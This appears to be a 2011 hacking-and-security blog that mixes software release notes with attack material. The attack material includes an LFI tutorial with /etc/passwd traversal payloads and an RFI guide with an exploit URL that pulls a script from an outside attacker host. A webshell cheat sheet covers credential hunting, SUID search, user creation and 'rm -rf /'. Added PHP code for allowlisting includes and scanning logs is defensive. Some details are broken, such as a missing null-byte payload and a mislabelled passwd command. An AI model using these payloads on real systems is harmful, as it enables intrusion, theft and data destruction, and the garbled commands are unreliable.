Unreal 3.2.9-rc1 released for testing

I've released Unreal3.2.9-rc1 (Release Candidate 1) for testing.
There have been a lot of changes - twice as much as usual - since 3.2.8(.1), so this is just the first in a series of RCs for Unreal3.2.9.

Members of the public are welcome to test whether there are any major release-critical bugs (e.g. crash bugs) present, so they can be corrected before the real 3.2.9 release. If you want to help out testing a bit, check out the downloads below. Note that 3.2.9-rc1 should NOT be used on production servers!

For downloads, see www.unrealircd.com -> Downloads.

If you're willing to help some more, maybe you could help out in the Unreal3.2 testing forum as well, to test specific test items. Be sure to read the first post ('READ THIS! (how to use)').

Release notes are here.

PacketFence NAC System

If you want more control over which devices or endpoints access the network, PacketFence is for you. If you are looking at giving only Internet access to guests on your network, PacketFence is for you. If your network is a breeding ground for attacks, computer viruses or worms, PacketFence is for you.

PacketFence is a network access control (NAC) system. It is actively maintained and has been deployed in numerous large-scale institutions. It can be used to effectively secure networks, from small to very large heterogeneous networks. PacketFence provides NAC-oriented features such as registration of new network devices, detection of abnormal network activities including from remote snort sensors, isolation of problematic devices, remediation through a captive portal, and registration-based and scheduled vulnerability scans.

Download here

Malicious Cryptography

Cryptology is the study of the hidden word. It is an essential technology in times of war and has been in existence for thousands of years. The strategic positioning of troops is both a logistical challenge as well as a challenge from the perspective of information theory, since command and control information is subject to interception. It may be argued that cryptography has always had a dark side, since an enemy that uses it effectively will be able to conceal future enemy troop movements and other valuable information from allied forces. However, Malicious Cryptography digs much deeper into the dual-edged nature of cryptography. It shows how modern cryptographic paradigms and tools, including asymmetric cryptography, pseudorandom generators, reduction arguments, the random oracle model, etc. can in fact be used to degrade system security. The book details advanced computer viruses, worms, and Trojan horse programs that mount unprecedented attacks against their hosts. In short, it provides a glimpse of the future of information warfare, and also covers many of the tools that can be used to guard against these advanced threats to computing environments.

Download here

Samurai v0.8 Released

Samurai Web Testing Framework v0.8 Released
This is quite a major release with the integration of metasploit, target applications and tons of tool updates. It is now DVD sized as it has outgrown the CD release.
The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites.

Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.

The Samurai project team is happy to announce the release of a development version of the Samurai Web Testing Framework. This release is currently a fully functional Linux environment that has a number of the tools pre-installed.

Download here

OpenSCAP

The OpenSCAP Project was created to provide an open-source framework to the community which enables integration with the Security Content Automation Protocol (SCAP) suite of standards and capabilities. It is the goal of OpenSCAP to provide a simple, easy to use set of interfaces to serve as the framework for community use of SCAP.

SCAP is a line of standards managed by NIST. It was created to provide a standardized approach to maintaining the security of enterprise systems, such as automatically verifying the presence of patches, checking system security configuration settings, and examining systems for signs of compromise.

The SCAP suite contains multiple complex data exchange formats that are to be used to transmit important vulnerability, configuration, and other security data. Historically, there have been few tools that provide a way to query this data in the needed format. This lack of tools makes the barrier to entry very high and discourages adoption of these protocols by the community. It’s our goal to create a framework of libraries to improve the accessibility of SCAP and enhance the usability of the information it represents. Tools for parsing SCAP documents and querying content must be created to achieve this. This requires a common set of interfaces to be defined and implemented. It is the intent of this project to provide these interfaces and functional examples that would allow others in the open-source and vendor communities to make use of SCAP while minimizing the effort needed to gain value from it.

Download here

Proxy Switcher PRO v3.9.0.4

When you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.

The solution is to use Proxy Switcher for all your anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites, be that a download site that limits the amount of downloads or a video site that works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.

On top of that, if you used to change proxy settings manually, Proxy Switcher provides a way to change them much faster and more easily.

Download here

Local File Inclusion (LFI)

How can a bug like this exist?

On the programmer's side: how can the programmer prevent it?
On the attacker's side: how is this bug used in an attack?

First, what are LFI and RFI?
LFI (Local File Inclusion) is a hole in a site where an attacker can access all files on the server just through the URL.
RFI (Remote File Inclusion) is a hole where the site allows an attacker to include a file from outside the server.

Functions that can cause LFI/RFI:
include();
include_once();
require();
require_once();

Provided the server is configured with:
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off

On to an example.
Suppose we have a file index.php with content like this:

Code:
<?php
include($page); // $page comes straight from the ?page= URL parameter
?>

Say $page=main.php.
The URL would then look something like this:
h**p://www.sitevulnerable.com/index.php?page=main.php
and the script will display the page main.php.

Here the attacker can perform LFI because the variable page is included as-is.
For example, if the attacker wants to access the passwd file on the server, he might enter something like ../../../../../../../../../etc/passwd << where the number of "../" depends on how deep the folder containing index.php is.. the contents of the passwd file are then displayed in the browser.
With this we can also guess the folders in the site.. ^^

But suppose there is an error like this:
Quote

Warning: main(../../../../../../../../../etc/passwd.php) [function.main]: failed to open stream: No such file or directory in /their/web/root/index.php on line 2

Look at passwd: the .php extension has been added to it, which means the code used for the include looks like this:

Code:

<?php
include($page.".php"); // the request value gets ".php" appended before the include
?>

To get around that script we can use (provided magic_quotes_gpc = off), appended after /etc/passwd, like this:

h**p://www.sitevulnerable.com/index.php?page=../../../../../../../../../etc/passwd

What is it for? To drop the characters that come after it; this is called the null injection technique.
That is LFI.
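
The programmer-side question raised at the top of this post, as an added example (not part of the original post): an index.php whose include is driven by a fixed allowlist instead of the request value. The page names and the pages/ directory are assumptions for illustration.

```php
<?php
// Added example: index.php with the include driven by an allowlist.
// Page names and the pages/ directory are assumptions for illustration.
//
// Pattern shown in the post, for comparison (request value reaches include):
//   include($page . ".php");
//
// Matching php.ini hardening: allow_url_include = Off

const PAGE_DIR = __DIR__ . '/pages';

// Request value => file on disk. The request value is only ever used as an
// array key, never as part of a path, so "../", URLs and appended bytes
// cannot change which file is loaded.
const PAGES = [
    'main'    => 'main.php',
    'news'    => 'news.php',
    'contact' => 'contact.php',
];

/** Returns the absolute path to include, or null if the request is rejected. */
function resolve_page($requested): ?string
{
    // ?page[]=x arrives as an array; accept plain strings only.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: after symlink resolution the file must still sit
    // inside PAGE_DIR.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs of the kinds the post describes; run "php index.php".
    // 'main' resolves only if pages/main.php exists next to this file.
    $samples = ['main', 'main.php', '../../../../etc/passwd',
                'http://example.invalid/script?', ['main']];
    foreach ($samples as $in) {
        printf("%-36s => %s\n",
               json_encode($in, JSON_UNESCAPED_SLASHES),
               resolve_page($in) ?? 'rejected');
    }
    exit(0);
}

$target = resolve_page($_GET['page'] ?? 'main');
if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
include $target;
```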

Source

Remote File Inclusion (RFI)

Remote file inclusion can be understood as the insertion of a file
from outside into a file on a web server, with the aim that the script
inside it is executed when the file containing the insertion is loaded.
The technique itself requires that the web server concerned can run
server-side scripting (PHP, ASP, etc.) and that the inserted file is
written in that scripting language. Targets of remote file inclusion
are usually portals or content management systems (CMS), so a very
large number of websites are vulnerable to this type of attack.

In this article we will mostly discuss how file inclusion (which from
here on we call `injection') can happen in the PHP language.

° HOW CAN IT HAPPEN?
———————–

A file inclusion attack is based on mistaken or careless declaration
of variables in a file. A variable that is not declared or defined
properly can be exploited. The conditions for an injection are:

1. Variables that are not properly declared (unsanitized variables)

Variables in PHP take the form:

#1 include ($namavariable . "/file…")
#2 require_once ($namavariable . "/file…")
#3 include_once ($variable . "/file…")

Suppose we have a file named jscript.php that contains a variable like
this:


include($my_ms["root"].'/error.php');


That variable can have a file from outside the web server inserted
into it with a PHP injection exploit script:

http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?

The above is an example of exploiting MySpeach <= v3.0.2 (my_ms[root])

2. Settings in the php.ini file

#1. register_globals=On
#2. magic_quotes_gpc=off
#3. allow_url_fopen=on

° IS IT DANGEROUS?
————-

File inclusion carries a high risk level (High Risk), even a very
dangerous level (Very Dangerous), because injection allows the
perpetrator to execute commands remotely (Remote Commands Execution)
on the server. This is very dangerous for a server if the perpetrator
tries to gain higher access rights through local exploitation, so the
perpetrator may obtain administrator or root access.

Broadly, the risks of this attack are:

1. Web root folder / subdirectory defacing.
2. Privilege escalation (gaining higher access rights).
3. Running processes on the server (psyBNC, bots, etc.)
4. Pilfering, a.k.a. data theft (such as credentials information,
credit cards, etc.)
5. And much more…!!! Including server takeover and DDoS!

° WHICH OPERATING SYSTEM IS IMMUNE?
——————————

I am reminded of the game C&C Generals (my fave game!) when a hacker
comes out of the barracks. They say “NO SYSTEMS IS SAFE!”. Exactly
right! No operating system is safe from injection attacks as long as
it uses server-side scripting that can be exploited, no matter whether
it is Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, or
others.

° WHAT SHOULD BE DONE?
————————-

Many portals and white hat communities regularly publish the latest
bugs around injection. The safest approach is to always follow what
they publish so that you can make small but meaningful fixes to the
CMS you may be using now. Always watch the raw log that your hosting
service usually provides. If there is a somewhat deviant fetch such as
GET /index.php?page=http://www.injek-pake-kaki.net/cmd? you should be
suspicious, because this could be an attack on the web site or portal
you manage.

One of the safest techniques for an administrator is to always watch
for infiltration attempts and local exploitation attempts. Use a
firewall to keep out irresponsible people, and keep an eye on which
server ports are open.
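
The raw-log check described above, as an added example (not from the original article): it flags requests whose parameter values carry a URL, a directory-traversal sequence or a null byte. The log lines are constructed and the rule names are assumptions.

```php
<?php
// Added example: scan access-log lines for inclusion attempts in parameter
// values. Log lines are constructed (documentation IPs, example domains);
// the rule names are assumptions.

/** Returns the rule names a raw (still URL-encoded) parameter value trips. */
function classify_value(string $raw): array
{
    // Decode twice so double-encoded input (%252e%252e%252f) is also seen.
    $v = rawurldecode(rawurldecode($raw));
    $why = [];
    if (preg_match('#^\s*(?:https?|ftps?)://#i', $v)) {
        $why[] = 'remote-url';
    }
    if (preg_match('#(?:^|[/\\\\])\.\.(?:[/\\\\]|$)#', $v)) {
        $why[] = 'path-traversal';
    }
    if (strpos($v, "\0") !== false) {
        $why[] = 'null-byte';
    }
    return $why;
}

/** Returns one finding per suspicious parameter (Common/Combined Log Format). */
function scan_access_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // The request line is the quoted field: "METHOD target HTTP/x.y"
        if (!preg_match('#"[A-Z]+ (\S+) HTTP/[0-9.]+"#', $line, $m)) {
            continue;
        }
        $qpos = strpos($m[1], '?');
        if ($qpos === false) {
            continue; // no query string, nothing to inspect
        }
        foreach (explode('&', (string) substr($m[1], $qpos + 1)) as $pair) {
            $kv  = explode('=', $pair, 2);
            $why = classify_value($kv[1] ?? '');
            if ($why) {
                $hits[] = [
                    'line'   => $i + 1,
                    'client' => strtok($line, ' '),
                    'param'  => rawurldecode($kv[0]),
                    'why'    => implode(',', $why),
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample log: one normal request followed by four suspicious ones.
$log = [
    '192.0.2.10 - - [12/Mar/2011:10:01:02 +0700] "GET /index.php?page=main.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2011:10:01:09 +0700] "GET /index.php?page=http://www.example.net/cmd? HTTP/1.1" 200 312',
    '198.51.100.7 - - [12/Mar/2011:10:01:15 +0700] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '203.0.113.5 - - [12/Mar/2011:10:02:40 +0700] "GET /jscript.php?my_ms[root]=http://www.example.org/script? HTTP/1.1" 200 99',
    '203.0.113.5 - - [12/Mar/2011:10:02:44 +0700] "GET /index.php?page=../../etc/passwd%00 HTTP/1.1" 200 1843',
];

foreach (scan_access_log($log) as $h) {
    printf("line %d  %-14s %-12s %s\n",
           $h['line'], $h['client'], $h['param'], $h['why']);
}
```

A hit only says the request was attempted; the response status and size on the same log line help decide whether it needs follow-up.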

° ENDING
——

I wrote this article based on what I know, and if there are mistakes
due to my ignorance you can contact me by email. Experience is the
best teacher for us all. Anything can happen because no one is created
perfect. Nobody is perfect! No systems is safe!


Source

Webshell Commands

cat ./../mainfile.php – Config file.
ls -la – Lists directories.
ifconfig {eth0 etc} – ipconfig equivalent.
ps aux – Shows running processes.
gcc in_file -o out_file – Compiles a C file.
cat /etc/passwd – Lists accounts.
sudo – Superuser do: runs a command as root, provided you have perms in /etc/sudoers.
id – Tells you what user you're logged in as.
which wget curl w3m lynx – Checks to see what downloaders are present.
uname -r – Shows all release info (or) cat /etc/release.
uname -a – Shows all kernel info (or) cat /etc/issue
last -30 – Last 30 logged IPs; can be changed to the desired number.
useradd – Creates a new user account.
usermod – Modifies a user account.
w – See who is currently logged on.
locate password.txt – Locates password.txt in current dir; can use *.
rm -rf / – Please be careful with this command, I cannot stress this enough.
arp -a – Lists other machines that are on the same subnet.
lsattr -va – Lists file attributes on a Linux second extended file system.
find / -type f -perm -04000 -ls – Finds suid files.
find . -type f -perm -04000 -ls – Finds suid files in current dir.
find / -type f -perm -02000 -ls – Finds all sgid files.
find / -perm -2 -ls – Finds all writable files and folders.
find . -perm -2 -ls – Finds all writable files and folders in current dir.
find / -type f -name .bash_history – Finds bash history.
netstat -an | grep -i listen – Shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?
cat /proc/version /proc/cpuinfo – CPU info.
locate gcc – Finds gcc if installed.
set – Displays system variables.
echo $PATH – Echoes the current path.
lsmod – Dumps kernel modules.
mount/df – Checks mounted file systems.
rpm -qa – Checks patch level for RedHat 7.0.
dmesg – Checks hardware info.
cat /etc/syslog.conf – Log file.
uptime – Uptime check.
cat /proc/meminfo – Memory check.
find / -type f -perm -4 -print 2> /dev/null – Finds readable files.
find / -type f -perm -2 -print 2> /dev/null – Finds writable files.
chmod ### $folder – Chmod folder.
ls -l -b – Verbosely lists directories.

Feel free to add your own ^:)^

Source

Bug Dork LFI


Bug Dork RFI


Bug Dork XML


Google Unveils SSL Security Plans

As the security industry attempts to move on from the Comodo security breach, Google is shedding light on its plans for securing secure socket layer (SSL) certificates.

In a posting to the Google Online Security blog, security team engineer Ben Laurie outlined plans for a pair of projects which the company hopes will help to prevent future security incidents and restore user trust in online certificates.

The first project is an online catalogue for certificates. Laurie explained that the company is using its web crawling software to pore over sites and gather information on security certificates.

The company plans to turn the collection into the Google Certificate Catalog, a service which will function as a database of SSL certificates, allowing for connections to verify the authenticity of online certificate data.

In addition to the database, Google said that it would be working with the DNS-based Authentication of Named Entities (DANE) working group. The group is working to build a platform which can specify and validate the signing of online certificates.

“In the wake of the recent Comodo fraud incident, there has been a great deal of speculation about how to improve the public key infrastructure, on which the security of the Internet rests,” Laurie wrote.

“Unfortunately, this isn’t a problem that will be fixed overnight.”

Laurie was referring to the recent crisis with security firm Comodo in which a hacker was able to gain access to company data and then use the information to generate fake security certificates.

A hacker from Iran later claimed responsibility for the attacks.


 

Copyleft © 2011